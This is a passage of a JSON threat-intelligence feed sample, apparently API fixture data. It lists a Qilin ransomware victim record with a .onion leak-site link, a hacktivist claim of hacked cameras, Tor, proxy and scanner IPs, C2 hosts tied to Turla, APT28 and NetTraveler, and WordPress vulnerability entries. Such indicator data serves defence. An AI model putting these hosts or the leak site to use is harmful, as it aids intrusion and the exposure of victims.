"id": null, + "mitreId": "T1486", + "params": null + } + ], + "oldId": null, + "regions": [ + "america:northern_america" + ], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0616", + "sectors": [ + "real-estate:construction" + ], + "seqUpdate": 17270614084038, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [ + "http://kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad.onion/site/view?uuid=f73f99c9-0a5d-36ff-8fab-36e936caab39" + ], + "targetedCompany": [ + "Canstar Restorations" + ], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "18c14c0707e5cdaeb7975576fa54a4346d154619", + "isAPT": false, + "name": "Qilin" + }, + "title": "Qilin Ransomware attack on Canstar Restorations", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T06:16:48+03:00" + }, + { + "contacts": [ + { + "account": "sillycatsfr", + "flag": "fake", + "service": "telegram", + "type": "im" + }, + { + "account": "ftpcat", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T11:45:16+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-15", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

Pryx created a Telegram channel on 2024-09-15 named “The daily PRYX”:

 

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "green", + "tlp": "green", + "ttl": null + }, + "expertise": [], + "files": [ + { + "hash": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "mime": "image/png", + "name": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "size": 377290 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "4b6fd64b149127836d5ad524debf44917befc231", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1145", + "sectors": [], + "seqUpdate": 17270815547585, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "3b4ad4eaa284c3a8a4965e71be53959fae00c98a", + "isAPT": false, + "name": "Pryx" + }, + "title": "General information - new contacts", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T11:52:34+03:00" + }, + { + "contacts": [ + { + "account": "@examlpe", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T13:04:25+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

On 2024-09-23 in their Telegram channel (hxxps://t[.]me/ServerKillers) Server Killers posted message containing information about possible attack

We hacked South Korean Cameras!\n\nMost of the cameras are located in Seoul, Incheon, Daejeon, Suwon\n\nWe hacked:\n   Cafe Cameras \n   Restaurant Cameras \n   Home Cameras \n   Computer Room Cameras\n   Car Parking Cameras\n   Street Cameras\n   Office Cameras\n   Supermarket Cameras\n\nWe have hacked 100+ South Korean Cameras
\n", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "AutoReport", + "Deface" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": false, + "id": "13aad85a2c8eccce7217be1e16e39486c987bf17", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1304", + "sectors": [], + "seqUpdate": 17270858675384, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "RU", + "id": "8d22ccb2f4aace36992ce5ec9cf431c138536820", + "isAPT": false, + "name": "Server Killers" + }, + "title": "Server Killers posted message containing data about possible attack", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T13:04:27+03:00" + } + ], + "seqUpdate": 17270858675384 + }, + "suspicious_ip/tor_node":{ + "count": 252997, + "items": [ + { + "bind": null, + "dateFirstSeen": "2023-03-15T12:03:39+00:00", + "dateLastSeen": "2023-03-15T12:03:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "156.146.57.182", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "156.146.57.182", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360252525000, + "source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2023-03-22T06:07:10+00:00", + "dateLastSeen": "2023-03-22T06:07:10+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "188.241.80.46", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "188.241.80.46", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360269562000, + "source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2022-05-02T19:08:51+00:00", + "dateLastSeen": "2022-08-23T07:36:12+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "83.137.158.16", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "83.137.158.16", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360409780000, + "source": "tor_banner" + } + ], + "seqUpdate": 1682360409780000 + }, + "suspicious_ip/open_proxy":{ + "count": 3454691, + "items": [ + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.238.12.158", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "HK", + "countryName": null, + "ip": "61.238.12.158", + "provider": null, + "region": null + }, + "oldId": "11aaaac89b10f8863fef7335a1f7839a23c9a710", + "port": 8088, + "portalLink": null, + "seqUpdate": 1460383585066000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "http" + }, + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "1.175.177.135", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "1.175.177.135", + "provider": null, + "region": null + }, + "oldId": "78001defd30996ea8d4e770730631863bbd67ce9", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585071000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + }, + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.62.7.209", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "61.62.7.209", + "provider": null, + "region": null + }, + "oldId": "b3ac84363ff3659472a64dc6c313b5d0b0df4866", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585073000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + } + ], + "seqUpdate": 1460383585073000 + }, + "suspicious_ip/socks_proxy":{ + "count": 28086846, + "items": [ + { + "bind": null, + "dateDetected": "2014-11-05T05:00:11+00:00", + "dateFirstSeen": "2014-11-05T05:00:11+00:00", + "dateLastSeen": "2014-11-05T17:00:11+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "114.143.160.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "IN", + "countryName": null, + "ip": "114.143.160.66", + "provider": null, + "region": null + }, + "oldId": "a78ecc975e74876300f6ee54d829fabf6e1fc243", + "portalLink": null, + "seqUpdate": 1460491661013000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:20:03+00:00", + "dateFirstSeen": "2014-11-05T05:20:03+00:00", + "dateLastSeen": "2014-11-05T17:20:03+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "91.185.11.165", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "KZ", + "countryName": null, + "ip": "91.185.11.165", + "provider": null, + "region": null + }, + "oldId": "afa5e3e33a0d78d8dfc06f502400c4c17ffaf33d", + "portalLink": null, + "seqUpdate": 1460491661026000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:01:06+00:00", + "dateFirstSeen": "2014-11-05T05:01:06+00:00", + "dateLastSeen": "2014-11-05T17:01:06+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "1.46.71.151", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TH", + "countryName": null, + "ip": "1.46.71.151", + "provider": null, + "region": null + }, + "oldId": "f8eb2e7a96a6d5fa18232b74660a911a1511a435", + "portalLink": null, + "seqUpdate": 1460491661046000, + "source": "awmproxy", + "stixGuid": null + } + ], + "seqUpdate": 1460491661046000 + }, + "suspicious_ip/vpn":{ + "count": 741499, + "items": [ + { + "bind": null, + "dateFirstSeen": "2021-04-22T12:43:38+00:00", + "dateLastSeen": "2021-04-22T12:43:38+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "188.250.243.135", + "ipv4": { + "asn": "AS3243", + "city": null, + "countryCode": "PT", + "countryName": null, + "ip": "188.250.243.135", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409977576, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2021-04-17T12:03:44+00:00", + "dateLastSeen": "2021-04-17T12:03:44+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "52.188.125.80", + "ipv4": { + "asn": "AS8075", + "city": null, + "countryCode": null, + "countryName": null, + "ip": "52.188.125.80", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409978158, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2020-12-11T13:33:54+00:00", + "dateLastSeen": "2020-12-11T13:33:54+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "168.119.130.217", + "ipv4": { + "asn": "AS24940", + "city": null, + "countryCode": "DE", + "countryName": null, + "ip": "168.119.130.217", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657410005695, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + } + ], + "seqUpdate": 1671657410005695 + }, + "suspicious_ip/scanner":{ + "count": 20143973, + "items": [ + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:53+00:00", + "dateLastSeen": "2021-08-11T03:30:53+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "180.180.112.221", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "180.180.112.221", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force", + "SSH" + ], + "dateFirstSeen": "2021-08-11T03:51:19+00:00", + "dateLastSeen": "2021-08-11T08:57:51+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "159.89.54.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "159.89.54.66", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:49+00:00", + "dateLastSeen": "2021-08-11T03:30:49+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "49.149.72.230", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "49.149.72.230", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + } + ], + "seqUpdate": 1628553600000000 + }, + "malware/cnc":{ + "count": 148783, + "items": [ + { + "cnc": "hint09.9966.org", + "dateDetected": "2013-05-31T20:00:00Z", + "dateFirstSeen": "2013-05-31T20:00:00Z", + "dateLastSeen": "2013-05-31T20:00:00Z", + "domain": "hint09.9966.org", + "file": null, + "id": "cb08296b420fcce499ef84edb7ac314970953a00", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 13700304004, + "threatActor": [ + { + "id": "96054da361e4092a5a509862356f9f2541b86e9e", + "name": "NetTraveler" + } + ], + "url": "" + }, + { + "cnc": "82.113.19.75", + "dateDetected": "2014-08-06T20:00:00Z", + "dateFirstSeen": "2014-08-06T20:00:00Z", + "dateLastSeen": "2014-08-06T20:00:00Z", + "domain": "", + "file": null, + "id": "d67606f9fb3f81dbddbea74f3231613a742dc397", + "ipv4": [ + { + "asn": "", + "city": "", + "countryCode": "", + "countryName": "", + "ip": "82.113.19.75", + "provider": "", + "region": "" + } + ], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14073552002, + "threatActor": [ + { + "id": "03cf30aa129ecf2eba833773e10786b1558ac212", + "name": "Turla" + } + ], + "url": "" + }, + { + "cnc": "sofexjordan2014.com", + "dateDetected": "2014-10-21T20:00:00Z", + "dateFirstSeen": "2014-10-21T20:00:00Z", + "dateLastSeen": "2014-10-21T20:00:00Z", + "domain": "sofexjordan2014.com", + "file": null, + "id": "f304865cea057e3bfce2a2f38cbbe0dabaa32728", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14139216000, + "threatActor": [ + { + "id": "fbde425d47a07be229130d3bd3a61b90d2b090ca", + "name": "APT28" + } + ], + "url": "" + } + ], + "seqUpdate": 14139216000 + }, + "osi/vulnerability":{ + "count": 454062, + "items": [ + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:04+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7181", + "id": "WPVDB-ID:7181", + "lastseen": "2018-09-17T17:26:04+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944090287, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "super-refer-a-friend", + "operator": "lt", + "version": "1.0" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:47+01:00", + "dateModified": "2018-08-28T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - super-refer-a-friend - Full Path Disclosure\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/6620", + "id": "WPVDB-ID:6620", + "lastseen": "2018-09-17T17:26:47+01:00", + "mergedCvss": 0, + "modified": "2018-08-28T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944269535, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "super-refer-a-friend - Full Path Disclosure", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:03+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7180", + "id": "WPVDB-ID:7180", + "lastseen": "2018-09-17T17:26:03+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944270178, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + } + ], + "seqUpdate": 15677944270178 + }, + "osi/git_repository":{ + "count": 4, + "items": [ + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "password": 1 + }, + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T22:34:14+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "53e081b81ede4de32383bfc7a274877cad14cca0", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "8b6cd23d023fbc3f2117b5cb9cb1de5ee936e639", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647341 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff4809c63e236267da1987e2f85b6e3b67492cbf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1107c7dc3a868e7d2e28c3d45aedcee685991b8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f840db446914b74742a2edc06997a14754b6701b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "d8aa39502e78cf1b7fc693ddc2a8d87584de591d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5ff597aa0bcf83af6a0065a87369db0d35a0aa9c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "0ae60813662b989e7be38ed11ad3b678d849a4f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4a88bc25d04b611667615d9585c83f352c11a08b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": 